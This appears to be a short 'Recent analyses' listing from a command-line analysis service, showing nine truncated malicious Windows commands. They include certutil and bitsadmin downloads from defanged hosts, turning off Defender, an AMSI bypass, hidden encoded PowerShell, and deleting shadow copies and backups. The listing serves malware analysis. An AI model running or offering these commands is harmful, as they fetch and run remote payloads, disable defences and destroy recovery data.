Recent analyses

cmd.exe /c cd /d "C:\inetpub\wwwroot\aspnet_client\" & certutil.exe -urlcache -split -f hxxp://p.estonine[.]com/p & p

bitsadmin /transfer "WindowsUpdate" /download /priority normal hxxp://update-svc[.]xyz/patch.exe C:\Windows\Temp\patch.e…

powershell.exe -ep bypass -c "Set-MpPreference -DisableRealtimeMonitoring $true; schtasks /create /tn 'WindowsSecurityHe…

powershell -NonInteractive -WindowStyle Hidden -EncodedCommand JABiAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAR…

powershell -nop -w hidden -ep bypass -EncodedCommand JABiAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQB…

cmd.exe /c vssadmin delete shadows /all /quiet & wbadmin delete catalog -quiet & bcdedit /set {default} bootstatuspolicy…

powershell -ep bypass -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','No…

powershell.exe -NonInteractive -WindowStyle Hidden -EncodedCommand JABjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuA…

powershell -c "$b=[System.Convert]::FromBase64String('H4sIAAAAAAAA/6tWKkktLlGyUlIqS40vLUpVslIqLU4tykvMTQUA6nU3RDEAAAA=')…